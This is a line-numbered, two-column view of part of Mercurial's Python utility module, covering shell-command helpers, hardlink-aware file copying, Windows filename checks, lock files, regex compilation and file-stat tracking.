1426 return _hgexecutable
1435
1427
1436 def _sethgexecutable(path):
1428 def _sethgexecutable(path):
1437 """set location of the 'hg' executable"""
1429 """set location of the 'hg' executable"""
1438 global _hgexecutable
1430 global _hgexecutable
1439 _hgexecutable = path
1431 _hgexecutable = path
1440
1432
1441 def _isstdout(f):
1433 def _isstdout(f):
1442 fileno = getattr(f, 'fileno', None)
1434 fileno = getattr(f, 'fileno', None)
1443 try:
1435 try:
1444 return fileno and fileno() == sys.__stdout__.fileno()
1436 return fileno and fileno() == sys.__stdout__.fileno()
1445 except io.UnsupportedOperation:
1437 except io.UnsupportedOperation:
1446 return False # fileno() raised UnsupportedOperation
1438 return False # fileno() raised UnsupportedOperation
1447
1439
1448 def shellenviron(environ=None):
1440 def shellenviron(environ=None):
1449 """return environ with optional override, useful for shelling out"""
1441 """return environ with optional override, useful for shelling out"""
1450 def py2shell(val):
1442 def py2shell(val):
1451 'convert python object into string that is useful to shell'
1443 'convert python object into string that is useful to shell'
1452 if val is None or val is False:
1444 if val is None or val is False:
1453 return '0'
1445 return '0'
1454 if val is True:
1446 if val is True:
1455 return '1'
1447 return '1'
1456 return pycompat.bytestr(val)
1448 return pycompat.bytestr(val)
1457 env = dict(encoding.environ)
1449 env = dict(encoding.environ)
1458 if environ:
1450 if environ:
1459 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1451 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1460 env['HG'] = hgexecutable()
1452 env['HG'] = hgexecutable()
1461 return env
1453 return env
1462
1454
1463 def system(cmd, environ=None, cwd=None, out=None):
1455 def system(cmd, environ=None, cwd=None, out=None):
1464 '''enhanced shell command execution.
1456 '''enhanced shell command execution.
1465 run with environment maybe modified, maybe in different dir.
1457 run with environment maybe modified, maybe in different dir.
1466
1458
1467 if out is specified, it is assumed to be a file-like object that has a
1459 if out is specified, it is assumed to be a file-like object that has a
1468 write() method. stdout and stderr will be redirected to out.'''
1460 write() method. stdout and stderr will be redirected to out.'''
1469 try:
1461 try:
1470 stdout.flush()
1462 stdout.flush()
1471 except Exception:
1463 except Exception:
1472 pass
1464 pass
1473 cmd = quotecommand(cmd)
1465 cmd = quotecommand(cmd)
1474 env = shellenviron(environ)
1466 env = shellenviron(environ)
1475 if out is None or _isstdout(out):
1467 if out is None or _isstdout(out):
1476 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1468 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1477 env=env, cwd=cwd)
1469 env=env, cwd=cwd)
1478 else:
1470 else:
1479 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1471 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1480 env=env, cwd=cwd, stdout=subprocess.PIPE,
1472 env=env, cwd=cwd, stdout=subprocess.PIPE,
1481 stderr=subprocess.STDOUT)
1473 stderr=subprocess.STDOUT)
1482 for line in iter(proc.stdout.readline, ''):
1474 for line in iter(proc.stdout.readline, ''):
1483 out.write(line)
1475 out.write(line)
1484 proc.wait()
1476 proc.wait()
1485 rc = proc.returncode
1477 rc = proc.returncode
1486 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1478 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1487 rc = 0
1479 rc = 0
1488 return rc
1480 return rc
1489
1481
1490 def checksignature(func):
1482 def checksignature(func):
1491 '''wrap a function with code to check for calling errors'''
1483 '''wrap a function with code to check for calling errors'''
1492 def check(*args, **kwargs):
1484 def check(*args, **kwargs):
1493 try:
1485 try:
1494 return func(*args, **kwargs)
1486 return func(*args, **kwargs)
1495 except TypeError:
1487 except TypeError:
1496 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1488 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1497 raise error.SignatureError
1489 raise error.SignatureError
1498 raise
1490 raise
1499
1491
1500 return check
1492 return check
1501
1493
1502 # a whilelist of known filesystems where hardlink works reliably
1494 # a whilelist of known filesystems where hardlink works reliably
1503 _hardlinkfswhitelist = {
1495 _hardlinkfswhitelist = {
1504 'btrfs',
1496 'btrfs',
1505 'ext2',
1497 'ext2',
1506 'ext3',
1498 'ext3',
1507 'ext4',
1499 'ext4',
1508 'hfs',
1500 'hfs',
1509 'jfs',
1501 'jfs',
1510 'NTFS',
1502 'NTFS',
1511 'reiserfs',
1503 'reiserfs',
1512 'tmpfs',
1504 'tmpfs',
1513 'ufs',
1505 'ufs',
1514 'xfs',
1506 'xfs',
1515 'zfs',
1507 'zfs',
1516 }
1508 }
1517
1509
1518 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1510 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1519 '''copy a file, preserving mode and optionally other stat info like
1511 '''copy a file, preserving mode and optionally other stat info like
1520 atime/mtime
1512 atime/mtime
1521
1513
1522 checkambig argument is used with filestat, and is useful only if
1514 checkambig argument is used with filestat, and is useful only if
1523 destination file is guarded by any lock (e.g. repo.lock or
1515 destination file is guarded by any lock (e.g. repo.lock or
1524 repo.wlock).
1516 repo.wlock).
1525
1517
1526 copystat and checkambig should be exclusive.
1518 copystat and checkambig should be exclusive.
1527 '''
1519 '''
1528 assert not (copystat and checkambig)
1520 assert not (copystat and checkambig)
1529 oldstat = None
1521 oldstat = None
1530 if os.path.lexists(dest):
1522 if os.path.lexists(dest):
1531 if checkambig:
1523 if checkambig:
1532 oldstat = checkambig and filestat.frompath(dest)
1524 oldstat = checkambig and filestat.frompath(dest)
1533 unlink(dest)
1525 unlink(dest)
1534 if hardlink:
1526 if hardlink:
1535 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1527 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1536 # unless we are confident that dest is on a whitelisted filesystem.
1528 # unless we are confident that dest is on a whitelisted filesystem.
1537 try:
1529 try:
1538 fstype = getfstype(os.path.dirname(dest))
1530 fstype = getfstype(os.path.dirname(dest))
1539 except OSError:
1531 except OSError:
1540 fstype = None
1532 fstype = None
1541 if fstype not in _hardlinkfswhitelist:
1533 if fstype not in _hardlinkfswhitelist:
1542 hardlink = False
1534 hardlink = False
1543 if hardlink:
1535 if hardlink:
1544 try:
1536 try:
1545 oslink(src, dest)
1537 oslink(src, dest)
1546 return
1538 return
1547 except (IOError, OSError):
1539 except (IOError, OSError):
1548 pass # fall back to normal copy
1540 pass # fall back to normal copy
1549 if os.path.islink(src):
1541 if os.path.islink(src):
1550 os.symlink(os.readlink(src), dest)
1542 os.symlink(os.readlink(src), dest)
1551 # copytime is ignored for symlinks, but in general copytime isn't needed
1543 # copytime is ignored for symlinks, but in general copytime isn't needed
1552 # for them anyway
1544 # for them anyway
1553 else:
1545 else:
1554 try:
1546 try:
1555 shutil.copyfile(src, dest)
1547 shutil.copyfile(src, dest)
1556 if copystat:
1548 if copystat:
1557 # copystat also copies mode
1549 # copystat also copies mode
1558 shutil.copystat(src, dest)
1550 shutil.copystat(src, dest)
1559 else:
1551 else:
1560 shutil.copymode(src, dest)
1552 shutil.copymode(src, dest)
1561 if oldstat and oldstat.stat:
1553 if oldstat and oldstat.stat:
1562 newstat = filestat.frompath(dest)
1554 newstat = filestat.frompath(dest)
1563 if newstat.isambig(oldstat):
1555 if newstat.isambig(oldstat):
1564 # stat of copied file is ambiguous to original one
1556 # stat of copied file is ambiguous to original one
1565 advanced = (
1557 advanced = (
1566 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1558 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1567 os.utime(dest, (advanced, advanced))
1559 os.utime(dest, (advanced, advanced))
1568 except shutil.Error as inst:
1560 except shutil.Error as inst:
1569 raise Abort(str(inst))
1561 raise Abort(str(inst))
1570
1562
1571 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1563 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1572 """Copy a directory tree using hardlinks if possible."""
1564 """Copy a directory tree using hardlinks if possible."""
1573 num = 0
1565 num = 0
1574
1566
1575 gettopic = lambda: hardlink and _('linking') or _('copying')
1567 gettopic = lambda: hardlink and _('linking') or _('copying')
1576
1568
1577 if os.path.isdir(src):
1569 if os.path.isdir(src):
1578 if hardlink is None:
1570 if hardlink is None:
1579 hardlink = (os.stat(src).st_dev ==
1571 hardlink = (os.stat(src).st_dev ==
1580 os.stat(os.path.dirname(dst)).st_dev)
1572 os.stat(os.path.dirname(dst)).st_dev)
1581 topic = gettopic()
1573 topic = gettopic()
1582 os.mkdir(dst)
1574 os.mkdir(dst)
1583 for name, kind in listdir(src):
1575 for name, kind in listdir(src):
1584 srcname = os.path.join(src, name)
1576 srcname = os.path.join(src, name)
1585 dstname = os.path.join(dst, name)
1577 dstname = os.path.join(dst, name)
1586 def nprog(t, pos):
1578 def nprog(t, pos):
1587 if pos is not None:
1579 if pos is not None:
1588 return progress(t, pos + num)
1580 return progress(t, pos + num)
1589 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1581 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1590 num += n
1582 num += n
1591 else:
1583 else:
1592 if hardlink is None:
1584 if hardlink is None:
1593 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1585 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1594 os.stat(os.path.dirname(dst)).st_dev)
1586 os.stat(os.path.dirname(dst)).st_dev)
1595 topic = gettopic()
1587 topic = gettopic()
1596
1588
1597 if hardlink:
1589 if hardlink:
1598 try:
1590 try:
1599 oslink(src, dst)
1591 oslink(src, dst)
1600 except (IOError, OSError):
1592 except (IOError, OSError):
1601 hardlink = False
1593 hardlink = False
1602 shutil.copy(src, dst)
1594 shutil.copy(src, dst)
1603 else:
1595 else:
1604 shutil.copy(src, dst)
1596 shutil.copy(src, dst)
1605 num += 1
1597 num += 1
1606 progress(topic, num)
1598 progress(topic, num)
1607 progress(topic, None)
1599 progress(topic, None)
1608
1600
1609 return hardlink, num
1601 return hardlink, num
1610
1602
1611 _winreservednames = {
1603 _winreservednames = {
1612 'con', 'prn', 'aux', 'nul',
1604 'con', 'prn', 'aux', 'nul',
1613 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1605 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1614 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1606 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1615 }
1607 }
1616 _winreservedchars = ':*?"<>|'
1608 _winreservedchars = ':*?"<>|'
1617 def checkwinfilename(path):
1609 def checkwinfilename(path):
1618 r'''Check that the base-relative path is a valid filename on Windows.
1610 r'''Check that the base-relative path is a valid filename on Windows.
1619 Returns None if the path is ok, or a UI string describing the problem.
1611 Returns None if the path is ok, or a UI string describing the problem.
1620
1612
1621 >>> checkwinfilename(b"just/a/normal/path")
1613 >>> checkwinfilename(b"just/a/normal/path")
1622 >>> checkwinfilename(b"foo/bar/con.xml")
1614 >>> checkwinfilename(b"foo/bar/con.xml")
1623 "filename contains 'con', which is reserved on Windows"
1615 "filename contains 'con', which is reserved on Windows"
1624 >>> checkwinfilename(b"foo/con.xml/bar")
1616 >>> checkwinfilename(b"foo/con.xml/bar")
1625 "filename contains 'con', which is reserved on Windows"
1617 "filename contains 'con', which is reserved on Windows"
1626 >>> checkwinfilename(b"foo/bar/xml.con")
1618 >>> checkwinfilename(b"foo/bar/xml.con")
1627 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1619 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1628 "filename contains 'AUX', which is reserved on Windows"
1620 "filename contains 'AUX', which is reserved on Windows"
1629 >>> checkwinfilename(b"foo/bar/bla:.txt")
1621 >>> checkwinfilename(b"foo/bar/bla:.txt")
1630 "filename contains ':', which is reserved on Windows"
1622 "filename contains ':', which is reserved on Windows"
1631 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1623 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1632 "filename contains '\\x07', which is invalid on Windows"
1624 "filename contains '\\x07', which is invalid on Windows"
1633 >>> checkwinfilename(b"foo/bar/bla ")
1625 >>> checkwinfilename(b"foo/bar/bla ")
1634 "filename ends with ' ', which is not allowed on Windows"
1626 "filename ends with ' ', which is not allowed on Windows"
1635 >>> checkwinfilename(b"../bar")
1627 >>> checkwinfilename(b"../bar")
1636 >>> checkwinfilename(b"foo\\")
1628 >>> checkwinfilename(b"foo\\")
1637 "filename ends with '\\', which is invalid on Windows"
1629 "filename ends with '\\', which is invalid on Windows"
1638 >>> checkwinfilename(b"foo\\/bar")
1630 >>> checkwinfilename(b"foo\\/bar")
1639 "directory name ends with '\\', which is invalid on Windows"
1631 "directory name ends with '\\', which is invalid on Windows"
1640 '''
1632 '''
1641 if path.endswith('\\'):
1633 if path.endswith('\\'):
1642 return _("filename ends with '\\', which is invalid on Windows")
1634 return _("filename ends with '\\', which is invalid on Windows")
1643 if '\\/' in path:
1635 if '\\/' in path:
1644 return _("directory name ends with '\\', which is invalid on Windows")
1636 return _("directory name ends with '\\', which is invalid on Windows")
1645 for n in path.replace('\\', '/').split('/'):
1637 for n in path.replace('\\', '/').split('/'):
1646 if not n:
1638 if not n:
1647 continue
1639 continue
1648 for c in _filenamebytestr(n):
1640 for c in _filenamebytestr(n):
1649 if c in _winreservedchars:
1641 if c in _winreservedchars:
1650 return _("filename contains '%s', which is reserved "
1642 return _("filename contains '%s', which is reserved "
1651 "on Windows") % c
1643 "on Windows") % c
1652 if ord(c) <= 31:
1644 if ord(c) <= 31:
1653 return _("filename contains '%s', which is invalid "
1645 return _("filename contains '%s', which is invalid "
1654 "on Windows") % escapestr(c)
1646 "on Windows") % escapestr(c)
1655 base = n.split('.')[0]
1647 base = n.split('.')[0]
1656 if base and base.lower() in _winreservednames:
1648 if base and base.lower() in _winreservednames:
1657 return _("filename contains '%s', which is reserved "
1649 return _("filename contains '%s', which is reserved "
1658 "on Windows") % base
1650 "on Windows") % base
1659 t = n[-1:]
1651 t = n[-1:]
1660 if t in '. ' and n not in '..':
1652 if t in '. ' and n not in '..':
1661 return _("filename ends with '%s', which is not allowed "
1653 return _("filename ends with '%s', which is not allowed "
1662 "on Windows") % t
1654 "on Windows") % t
1663
1655
1664 if pycompat.iswindows:
1656 if pycompat.iswindows:
1665 checkosfilename = checkwinfilename
1657 checkosfilename = checkwinfilename
1666 timer = time.clock
1658 timer = time.clock
1667 else:
1659 else:
1668 checkosfilename = platform.checkosfilename
1660 checkosfilename = platform.checkosfilename
1669 timer = time.time
1661 timer = time.time
1670
1662
1671 if safehasattr(time, "perf_counter"):
1663 if safehasattr(time, "perf_counter"):
1672 timer = time.perf_counter
1664 timer = time.perf_counter
1673
1665
1674 def makelock(info, pathname):
1666 def makelock(info, pathname):
1675 """Create a lock file atomically if possible
1667 """Create a lock file atomically if possible
1676
1668
1677 This may leave a stale lock file if symlink isn't supported and signal
1669 This may leave a stale lock file if symlink isn't supported and signal
1678 interrupt is enabled.
1670 interrupt is enabled.
1679 """
1671 """
1680 try:
1672 try:
1681 return os.symlink(info, pathname)
1673 return os.symlink(info, pathname)
1682 except OSError as why:
1674 except OSError as why:
1683 if why.errno == errno.EEXIST:
1675 if why.errno == errno.EEXIST:
1684 raise
1676 raise
1685 except AttributeError: # no symlink in os
1677 except AttributeError: # no symlink in os
1686 pass
1678 pass
1687
1679
1688 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1680 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1689 ld = os.open(pathname, flags)
1681 ld = os.open(pathname, flags)
1690 os.write(ld, info)
1682 os.write(ld, info)
1691 os.close(ld)
1683 os.close(ld)
1692
1684
1693 def readlock(pathname):
1685 def readlock(pathname):
1694 try:
1686 try:
1695 return os.readlink(pathname)
1687 return os.readlink(pathname)
1696 except OSError as why:
1688 except OSError as why:
1697 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1689 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1698 raise
1690 raise
1699 except AttributeError: # no symlink in os
1691 except AttributeError: # no symlink in os
1700 pass
1692 pass
1701 fp = posixfile(pathname, 'rb')
1693 fp = posixfile(pathname, 'rb')
1702 r = fp.read()
1694 r = fp.read()
1703 fp.close()
1695 fp.close()
1704 return r
1696 return r
1705
1697
1706 def fstat(fp):
1698 def fstat(fp):
1707 '''stat file object that may not have fileno method.'''
1699 '''stat file object that may not have fileno method.'''
1708 try:
1700 try:
1709 return os.fstat(fp.fileno())
1701 return os.fstat(fp.fileno())
1710 except AttributeError:
1702 except AttributeError:
1711 return os.stat(fp.name)
1703 return os.stat(fp.name)
1712
1704
1713 # File system features
1705 # File system features
1714
1706
1715 def fscasesensitive(path):
1707 def fscasesensitive(path):
1716 """
1708 """
1717 Return true if the given path is on a case-sensitive filesystem
1709 Return true if the given path is on a case-sensitive filesystem
1718
1710
1719 Requires a path (like /foo/.hg) ending with a foldable final
1711 Requires a path (like /foo/.hg) ending with a foldable final
1720 directory component.
1712 directory component.
1721 """
1713 """
1722 s1 = os.lstat(path)
1714 s1 = os.lstat(path)
1723 d, b = os.path.split(path)
1715 d, b = os.path.split(path)
1724 b2 = b.upper()
1716 b2 = b.upper()
1725 if b == b2:
1717 if b == b2:
1726 b2 = b.lower()
1718 b2 = b.lower()
1727 if b == b2:
1719 if b == b2:
1728 return True # no evidence against case sensitivity
1720 return True # no evidence against case sensitivity
1729 p2 = os.path.join(d, b2)
1721 p2 = os.path.join(d, b2)
1730 try:
1722 try:
1731 s2 = os.lstat(p2)
1723 s2 = os.lstat(p2)
1732 if s2 == s1:
1724 if s2 == s1:
1733 return False
1725 return False
1734 return True
1726 return True
1735 except OSError:
1727 except OSError:
1736 return True
1728 return True
1737
1729
1738 try:
1730 try:
1739 import re2
1731 import re2
1740 _re2 = None
1732 _re2 = None
1741 except ImportError:
1733 except ImportError:
1742 _re2 = False
1734 _re2 = False
1743
1735
1744 class _re(object):
1736 class _re(object):
1745 def _checkre2(self):
1737 def _checkre2(self):
1746 global _re2
1738 global _re2
1747 try:
1739 try:
1748 # check if match works, see issue3964
1740 # check if match works, see issue3964
1749 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1741 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1750 except ImportError:
1742 except ImportError:
1751 _re2 = False
1743 _re2 = False
1752
1744
1753 def compile(self, pat, flags=0):
1745 def compile(self, pat, flags=0):
1754 '''Compile a regular expression, using re2 if possible
1746 '''Compile a regular expression, using re2 if possible
1755
1747
1756 For best performance, use only re2-compatible regexp features. The
1748 For best performance, use only re2-compatible regexp features. The
1757 only flags from the re module that are re2-compatible are
1749 only flags from the re module that are re2-compatible are
1758 IGNORECASE and MULTILINE.'''
1750 IGNORECASE and MULTILINE.'''
1759 if _re2 is None:
1751 if _re2 is None:
1760 self._checkre2()
1752 self._checkre2()
1761 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1753 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1762 if flags & remod.IGNORECASE:
1754 if flags & remod.IGNORECASE:
1763 pat = '(?i)' + pat
1755 pat = '(?i)' + pat
1764 if flags & remod.MULTILINE:
1756 if flags & remod.MULTILINE:
1765 pat = '(?m)' + pat
1757 pat = '(?m)' + pat
1766 try:
1758 try:
1767 return re2.compile(pat)
1759 return re2.compile(pat)
1768 except re2.error:
1760 except re2.error:
1769 pass
1761 pass
1770 return remod.compile(pat, flags)
1762 return remod.compile(pat, flags)
1771
1763
1772 @propertycache
1764 @propertycache
1773 def escape(self):
1765 def escape(self):
1774 '''Return the version of escape corresponding to self.compile.
1766 '''Return the version of escape corresponding to self.compile.
1775
1767
1776 This is imperfect because whether re2 or re is used for a particular
1768 This is imperfect because whether re2 or re is used for a particular
1777 function depends on the flags, etc, but it's the best we can do.
1769 function depends on the flags, etc, but it's the best we can do.
1778 '''
1770 '''
1779 global _re2
1771 global _re2
1780 if _re2 is None:
1772 if _re2 is None:
1781 self._checkre2()
1773 self._checkre2()
1782 if _re2:
1774 if _re2:
1783 return re2.escape
1775 return re2.escape
1784 else:
1776 else:
1785 return remod.escape
1777 return remod.escape
1786
1778
1787 re = _re()
1779 re = _re()
1788
1780
1789 _fspathcache = {}
1781 _fspathcache = {}
1790 def fspath(name, root):
1782 def fspath(name, root):
1791 '''Get name in the case stored in the filesystem
1783 '''Get name in the case stored in the filesystem
1792
1784
1793 The name should be relative to root, and be normcase-ed for efficiency.
1785 The name should be relative to root, and be normcase-ed for efficiency.
1794
1786
1795 Note that this function is unnecessary, and should not be
1787 Note that this function is unnecessary, and should not be
1796 called, for case-sensitive filesystems (simply because it's expensive).
1788 called, for case-sensitive filesystems (simply because it's expensive).
1797
1789
1798 The root should be normcase-ed, too.
1790 The root should be normcase-ed, too.
1799 '''
1791 '''
1800 def _makefspathcacheentry(dir):
1792 def _makefspathcacheentry(dir):
1801 return dict((normcase(n), n) for n in os.listdir(dir))
1793 return dict((normcase(n), n) for n in os.listdir(dir))
1802
1794
1803 seps = pycompat.ossep
1795 seps = pycompat.ossep
1804 if pycompat.osaltsep:
1796 if pycompat.osaltsep:
1805 seps = seps + pycompat.osaltsep
1797 seps = seps + pycompat.osaltsep
1806 # Protect backslashes. This gets silly very quickly.
1798 # Protect backslashes. This gets silly very quickly.
1807 seps.replace('\\','\\\\')
1799 seps.replace('\\','\\\\')
1808 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1800 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1809 dir = os.path.normpath(root)
1801 dir = os.path.normpath(root)
1810 result = []
1802 result = []
1811 for part, sep in pattern.findall(name):
1803 for part, sep in pattern.findall(name):
1812 if sep:
1804 if sep:
1813 result.append(sep)
1805 result.append(sep)
1814 continue
1806 continue
1815
1807
1816 if dir not in _fspathcache:
1808 if dir not in _fspathcache:
1817 _fspathcache[dir] = _makefspathcacheentry(dir)
1809 _fspathcache[dir] = _makefspathcacheentry(dir)
1818 contents = _fspathcache[dir]
1810 contents = _fspathcache[dir]
1819
1811
1820 found = contents.get(part)
1812 found = contents.get(part)
1821 if not found:
1813 if not found:
1822 # retry "once per directory" per "dirstate.walk" which
1814 # retry "once per directory" per "dirstate.walk" which
1823 # may take place for each patches of "hg qpush", for example
1815 # may take place for each patches of "hg qpush", for example
1824 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1816 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1825 found = contents.get(part)
1817 found = contents.get(part)
1826
1818
1827 result.append(found or part)
1819 result.append(found or part)
1828 dir = os.path.join(dir, part)
1820 dir = os.path.join(dir, part)
1829
1821
1830 return ''.join(result)
1822 return ''.join(result)
1831
1823
1832 def checknlink(testfile):
1824 def checknlink(testfile):
1833 '''check whether hardlink count reporting works properly'''
1825 '''check whether hardlink count reporting works properly'''
1834
1826
1835 # testfile may be open, so we need a separate file for checking to
1827 # testfile may be open, so we need a separate file for checking to
1836 # work around issue2543 (or testfile may get lost on Samba shares)
1828 # work around issue2543 (or testfile may get lost on Samba shares)
1837 f1, f2, fp = None, None, None
1829 f1, f2, fp = None, None, None
1838 try:
1830 try:
1839 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1831 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1840 suffix='1~', dir=os.path.dirname(testfile))
1832 suffix='1~', dir=os.path.dirname(testfile))
1841 os.close(fd)
1833 os.close(fd)
1842 f2 = '%s2~' % f1[:-2]
1834 f2 = '%s2~' % f1[:-2]
1843
1835
1844 oslink(f1, f2)
1836 oslink(f1, f2)
1845 # nlinks() may behave differently for files on Windows shares if
1837 # nlinks() may behave differently for files on Windows shares if
1846 # the file is open.
1838 # the file is open.
1847 fp = posixfile(f2)
1839 fp = posixfile(f2)
1848 return nlinks(f2) > 1
1840 return nlinks(f2) > 1
1849 except OSError:
1841 except OSError:
1850 return False
1842 return False
1851 finally:
1843 finally:
1852 if fp is not None:
1844 if fp is not None:
1853 fp.close()
1845 fp.close()
1854 for f in (f1, f2):
1846 for f in (f1, f2):
1855 try:
1847 try:
1856 if f is not None:
1848 if f is not None:
1857 os.unlink(f)
1849 os.unlink(f)
1858 except OSError:
1850 except OSError:
1859 pass
1851 pass
1860
1852
1861 def endswithsep(path):
1853 def endswithsep(path):
1862 '''Check path ends with os.sep or os.altsep.'''
1854 '''Check path ends with os.sep or os.altsep.'''
1863 return (path.endswith(pycompat.ossep)
1855 return (path.endswith(pycompat.ossep)
1864 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1856 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1865
1857
1866 def splitpath(path):
1858 def splitpath(path):
1867 '''Split path by os.sep.
1859 '''Split path by os.sep.
1868 Note that this function does not use os.altsep because this is
1860 Note that this function does not use os.altsep because this is
1869 an alternative of simple "xxx.split(os.sep)".
1861 an alternative of simple "xxx.split(os.sep)".
1870 It is recommended to use os.path.normpath() before using this
1862 It is recommended to use os.path.normpath() before using this
1871 function if need.'''
1863 function if need.'''
1872 return path.split(pycompat.ossep)
1864 return path.split(pycompat.ossep)
1873
1865
1874 def gui():
1866 def gui():
1875 '''Are we running in a GUI?'''
1867 '''Are we running in a GUI?'''
1876 if pycompat.isdarwin:
1868 if pycompat.isdarwin:
1877 if 'SSH_CONNECTION' in encoding.environ:
1869 if 'SSH_CONNECTION' in encoding.environ:
1878 # handle SSH access to a box where the user is logged in
1870 # handle SSH access to a box where the user is logged in
1879 return False
1871 return False
1880 elif getattr(osutil, 'isgui', None):
1872 elif getattr(osutil, 'isgui', None):
1881 # check if a CoreGraphics session is available
1873 # check if a CoreGraphics session is available
1882 return osutil.isgui()
1874 return osutil.isgui()
1883 else:
1875 else:
1884 # pure build; use a safe default
1876 # pure build; use a safe default
1885 return True
1877 return True
1886 else:
1878 else:
1887 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1879 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1888
1880
1889 def mktempcopy(name, emptyok=False, createmode=None):
1881 def mktempcopy(name, emptyok=False, createmode=None):
1890 """Create a temporary file with the same contents from name
1882 """Create a temporary file with the same contents from name
1891
1883
1892 The permission bits are copied from the original file.
1884 The permission bits are copied from the original file.
1893
1885
1894 If the temporary file is going to be truncated immediately, you
1886 If the temporary file is going to be truncated immediately, you
1895 can use emptyok=True as an optimization.
1887 can use emptyok=True as an optimization.
1896
1888
1897 Returns the name of the temporary file.
1889 Returns the name of the temporary file.
1898 """
1890 """
1899 d, fn = os.path.split(name)
1891 d, fn = os.path.split(name)
1900 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1892 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1901 os.close(fd)
1893 os.close(fd)
1902 # Temporary files are created with mode 0600, which is usually not
1894 # Temporary files are created with mode 0600, which is usually not
1903 # what we want. If the original file already exists, just copy
1895 # what we want. If the original file already exists, just copy
1904 # its mode. Otherwise, manually obey umask.
1896 # its mode. Otherwise, manually obey umask.
1905 copymode(name, temp, createmode)
1897 copymode(name, temp, createmode)
1906 if emptyok:
1898 if emptyok:
1907 return temp
1899 return temp
1908 try:
1900 try:
1909 try:
1901 try:
1910 ifp = posixfile(name, "rb")
1902 ifp = posixfile(name, "rb")
1911 except IOError as inst:
1903 except IOError as inst:
1912 if inst.errno == errno.ENOENT:
1904 if inst.errno == errno.ENOENT:
1913 return temp
1905 return temp
1914 if not getattr(inst, 'filename', None):
1906 if not getattr(inst, 'filename', None):
1915 inst.filename = name
1907 inst.filename = name
1916 raise
1908 raise
1917 ofp = posixfile(temp, "wb")
1909 ofp = posixfile(temp, "wb")
1918 for chunk in filechunkiter(ifp):
1910 for chunk in filechunkiter(ifp):
1919 ofp.write(chunk)
1911 ofp.write(chunk)
1920 ifp.close()
1912 ifp.close()
1921 ofp.close()
1913 ofp.close()
1922 except: # re-raises
1914 except: # re-raises
1923 try:
1915 try:
1924 os.unlink(temp)
1916 os.unlink(temp)
1925 except OSError:
1917 except OSError:
1926 pass
1918 pass
1927 raise
1919 raise
1928 return temp
1920 return temp
1929
1921
1930 class filestat(object):
1922 class filestat(object):
1931 """help to exactly detect change of a file
1923 """help to exactly detect change of a file
1932
1924
1933 'stat' attribute is result of 'os.stat()' if specified 'path'
1925 'stat' attribute is result of 'os.stat()' if specified 'path'
1934 exists. Otherwise, it is None. This can avoid preparative
1926 exists. Otherwise, it is None. This can avoid preparative
1935 'exists()' examination on client side of this class.
1927 'exists()' examination on client side of this class.
1936 """
1928 """
1937 def __init__(self, stat):
1929 def __init__(self, stat):
1938 self.stat = stat
1930 self.stat = stat
1939
1931
1940 @classmethod
1932 @classmethod
1941 def frompath(cls, path):
1933 def frompath(cls, path):
1942 try:
1934 try:
1943 stat = os.stat(path)
1935 stat = os.stat(path)
1944 except OSError as err:
1936 except OSError as err:
1945 if err.errno != errno.ENOENT:
1937 if err.errno != errno.ENOENT:
1946 raise
1938 raise
1947 stat = None
1939 stat = None
1948 return cls(stat)
1940 return cls(stat)
1949
1941
1950 @classmethod
1942 @classmethod
1951 def fromfp(cls, fp):
1943 def fromfp(cls, fp):
1952 stat = os.fstat(fp.fileno())
1944 stat = os.fstat(fp.fileno())
1953 return cls(stat)
1945 return cls(stat)
1954
1946
1955 __hash__ = object.__hash__
